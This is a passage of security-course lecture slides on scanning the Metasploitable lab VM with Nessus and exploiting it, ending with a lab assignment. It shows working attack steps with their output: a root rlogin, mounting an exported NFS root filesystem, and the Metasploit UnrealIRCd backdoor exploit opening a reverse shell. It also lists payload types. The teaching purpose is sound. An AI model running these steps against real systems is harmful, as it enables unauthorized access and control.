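        print("%(port)d/tcp %(product)s %(version)s -> %(id)s [%(confidence)s]" % hit)
```

OpenSSH 4.7p1 produces no hit because the only advisory listed for it names a different version; a real lookup would compare version ranges rather than exact strings, and would still need the same "unverified" path for services nmap cannot version.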

Page 39:

Vulnerability Scanner - Nessus

• Nessus is a proprietary vulnerability scanner; the Home version is free

• Nessus runs a set of exploits on the open ports and reports vulnerabilities

• Vulnerability checks are implemented through plugins.
  • Plugins are written in Nessus Attack Scripting Language (NASL), a scripting language optimized for custom network interaction.
  • New plugins are added as vulnerabilities are discovered.
  • Many plugins check for a vulnerability by actually exploiting the vulnerability.
  • The ‘safe checks’ option specifies that no vulnerability check capable of crashing a remote host be used (such as DOS attacks).

• DEMO … look at Basic scan and Plugins

Page 40:

Vulnerability Scanner - Nessus

• Download Nessus

• On a Kali Linux terminal run /etc/init.d/nessusd start; you will get “Starting Nessus….”

• Go to https://127.0.0.1:8834/#/

Page 41:

Page 42:

Page 43:

Vulnerabilities

Now we know the vulnerabilities

What’s our goal with this knowledge?

- Understand where vulnerabilities arise from (to prevent them in future)

- Understand how exploitations happen (to be able to write signatures/ exploit detection)

Understand the vulnerability categories/ families (Nessus families?)

Find a tool to exploit / write an exploit

Metasploit – Rapid7 … Demo

Page 44:

Vulnerability – Rlogin Exploit

If we look at the Family column of the Nessus report, we see some simple ones

- Backdoor

- Gain a shell remotely

- Service Detection – the existence of the service itself indicates a vulnerability. Let’s try to exploit “rlogin service detection”

- Click on rlogin Service Detection in the Nessus report to get details

On Kali Linux install rsh-client (for the rlogin command; otherwise it defaults to ssh)

apt-get install rsh-client

rlogin -l root 10.0.2.4

Last login: Thu Jun 28 07:28:57 EDT 2018 from :0.0 on pts/0

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

Snip….Snip

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

You have new mail.

root@metasploitable:~#

Page 45:

Vulnerability – NFS Share Exploit

- Let’s try to exploit “nfs exported share information disclosure”

- Click on the same in the Nessus report to get details

On Kali Linux install rpcbind (only if you want to recheck whether nfs is running) and nfs-common

apt-get install rpcbind

apt-get install nfs-common

root@kali:~# showmount -e 10.0.2.4

Export list for 10.0.2.4:

/ *

root@kali:~# mkdir /tmp/r00t

root@kali:~# mount -t nfs 10.0.2.4:/ /tmp/r00t/

root@kali:~# ls

amit_passwd Documents Music Pictures Templates Videos

Desktop Downloads 'nmap scan reports' Public trojan.exe

Page 46:

Vulnerabilities – Exploit Payload

• Exploits are commonly used to install system malware, gain system access or recruit client machines into an existing ‘botnet’.

• This is accomplished with the help of a payload

• The payload is a sequence of code that is executed when the vulnerability is triggered

• To make things clear, an exploit is really broken up into two parts, like so:

EXPLOIT = Vulnerability + Payload

• Different payload types exist and they accomplish different tasks
  • exec → Execute a command or program on the remote system
  • download_exec → Download a file from a URL and execute
  • upload_exec → Upload a local file and execute
  • adduser → Add user to system accounts

Page 47:

Metasploit Framework

What is the Metasploit Framework?

• According to the Metasploit Team;

“The Metasploit Framework is a platform for writing, testing, and using

exploit code. The primary users of the Framework are professionals

performing penetration testing, shellcode development, and

vulnerability research.”

Page 48:

Metasploit Framework

• The MSF is not only an environment for exploit development but also a platform for launching exploits on real-world applications. It is packaged with real exploits that can cause real damage if not used professionally.

• Because MSF is an open-source tool and provides such a simplified method for launching dangerous attacks, it has attracted, and still attracts, blackhat and whitehat beginners. Fairly dangerous.

Page 49:

Vulnerabilities – Exploits using Metasploit

db_nmap -v -T4 -PA -sV --version-all --osscan-guess -A -sS -p 1-65535 <ip address>

Scans Metasploitable

Page 50:

Vulnerabilities – Exploits using Metasploit

• Run the following command: services

• Compare with the Nessus report

Page 51:

Vulnerabilities – Exploits using Metasploit

Usually the sequence for exploiting is

- Search for the exploit/ payload using the command “search xxx”. The search can be on multiple keywords related to the vulnerability, eg CVE, module etc.

- “use <Exploit>”

- “info” to get information on the exploit

- “run” to execute the exploit

Page 52:

Vulnerabilities – UnrealIRCd Backdoor Detection

- Click on UnrealIRCd Backdoor Detection in the Nessus report

Provides information including the CVE number ‘CVE-2010-2075’

- In Metasploit, ‘search CVE-2010-2075’ gives

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > search cve-2010-2075

Matching Modules

================

Name                                        Disclosure Date  Rank       Description

----                                        ---------------  ----       -----------

exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution

- ‘use exploit/unix/irc/unreal_ircd_3281_backdoor’ gives the cursor

msf exploit(unix/irc/unreal_ircd_3281_backdoor) >

- ‘info’ provides information on the payload. RHOST is not set

Page 53:

Vulnerabilities – UnrealIRCd Backdoor Detection

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST 10.0.2.4

RHOST => 10.0.2.4

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 10.0.2.15:4444

[*] 10.0.2.4:6667 - Connected to 10.0.2.4:6667...

:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...

:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

[*] 10.0.2.4:6667 - Sending backdoor command...

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo NkKbs49F8lfv25Hf;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "NkKbs49F8lfv25Hf\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (10.0.2.15:4444 -> 10.0.2.4:60006) at 2018-06-28 12:20:03 -0400

<<< Type commands >>>

Page 54:

Security Approach – Threat Modeling

Structured approach to identifying, quantifying, and addressing threats.

In threat modeling, we cover the three main elements:

• Assets: What valuable data and equipment should be secured?

• Threats: What may an attacker do to the system?

• Vulnerabilities: What flaws in the system allow an attacker to realize a threat?

Possible Steps to Threat Modeling

• Identify the Assets

• Describe the Architecture

• Break down the Applications

• Identify the Threats

• Document and Classify the Threats

• Rate the Threats

Page 55:

Lab 1.3

Nessus Scan – Metasploitable

Look at Vulnerabilities

2 Vulnerabilities without Metasploit

Metasploit Commands

2 Vulnerabilities with Metasploit